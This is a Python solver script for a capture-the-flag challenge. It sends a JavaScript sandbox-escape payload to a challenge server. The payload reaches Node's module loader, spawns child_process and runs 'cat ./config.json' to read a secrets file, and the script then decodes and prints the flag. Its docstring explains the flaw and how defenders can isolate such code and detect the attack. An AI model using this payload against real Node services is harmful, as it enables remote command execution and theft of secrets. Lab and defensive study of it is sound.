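#!/usr/bin/python
"""Solve a CTF "run this JavaScript" challenge and print the recovered flag.

The script POSTs one JavaScript expression to the challenge service in the
``run`` form field, reads the JSON reply, decodes the byte list found in its
``result`` member and prints the ``flag`` member of the decoded JSON document.

Why the expression in ``CODE`` works, and what it means for defenders:
the service evidently evaluates caller-supplied JavaScript inside the server
process (presumably with Node's ``vm`` module or a wrapper around it --
the server code is not shown here). An object reachable from the evaluated
code still belongs to the host realm, so its ``constructor.constructor`` is
the host ``Function``; code built with it sees the real ``process`` object and
from there the module loader. Node's documentation states that ``vm`` is not a
security mechanism. Untrusted code belongs in a separate, least-privileged
process or container that has no access to secrets such as ``config.json``,
and child-process creation by the web service is a useful detection signal.
"""
import urllib.request
import urllib.parse
import json

# JavaScript sent to the service, byte-for-byte as in the original write-up.
# It obtains the host Function constructor, uses it to reach
# process.mainModule.constructor._load (the module loader), loads
# "child_process" and runs `cat ./config.json` on the server.
CODE = 'new Function("return (this.constructor.constructor(\'return (this.process.mainModule.constructor._load)\')())")()("child_process").execSync("cat ./config.json")'

# Challenge endpoint. Plain HTTP: neither request nor reply is encrypted or
# authenticated.
URL = "http://whale.hacking-lab.com:3000/run"

# Upper bound for the HTTP exchange; without it urlopen() can block forever.
TIMEOUT_SECONDS = 30


class Payload(object):
    """Thin wrapper exposing the members of a JSON object via ``get``.

    ``j`` is JSON text (``str`` or UTF-8 ``bytes``) whose top level must be an
    object; anything else makes the ``__dict__`` assignment raise TypeError.
    """

    def __init__(self, j):
        # NOTE(review): the JSON comes from a remote service and becomes the
        # instance dictionary as-is, so a member named "get" would shadow the
        # method below. Acceptable for a one-off script, not for reuse.
        self.__dict__ = json.loads(j)

    def get(self, key):
        """Return the member ``key``; raises KeyError when it is absent."""
        return self.__dict__[key]


def decode_byte_list(text):
    """Turn the first ``[n, n, ...]`` list inside ``text`` into a string.

    Each ``n`` is a decimal code unit and is mapped with ``chr``. The list is
    presumably the ``data`` array of a serialised Node ``Buffer`` (the return
    value of ``execSync``) -- confirm against an actual reply.

    Raises:
        ValueError: when ``text`` holds no ``[`` ... ``]`` pair or an element
            is not a decimal integer.
    """
    start = text.find("[")
    # Search for the closing bracket only after the opening one; a stray "]"
    # earlier in the text would otherwise produce an empty, misleading slice.
    end = text.find("]", start + 1) if start != -1 else -1
    if start == -1 or end == -1:
        raise ValueError(
            "no bracketed byte list in result: {!r}".format(text[:80])
        )

    body = text[start + 1:end]
    if not body.strip():
        # "[]" is a valid, empty byte list (e.g. the command printed nothing).
        return ""
    # NOTE(review): chr() per element is correct for ASCII; multi-byte UTF-8
    # content would come out as mojibake.
    return "".join(chr(int(item.strip())) for item in body.split(","))


def run_remote(code, url=URL, timeout=TIMEOUT_SECONDS):
    """POST ``code`` as the ``run`` form field and return the raw reply bytes."""
    data = urllib.parse.urlencode({"run": code}).encode()
    request = urllib.request.Request(url, data=data)
    # The context manager closes the connection even if read() fails.
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return response.read()


def main():
    """Run the exchange and print the flag from the recovered config.json."""
    reply = Payload(run_remote(CODE))
    result = reply.get("result")
    config = Payload(decode_byte_list(result))
    print(config.get("flag"))


if __name__ == "__main__":
    main()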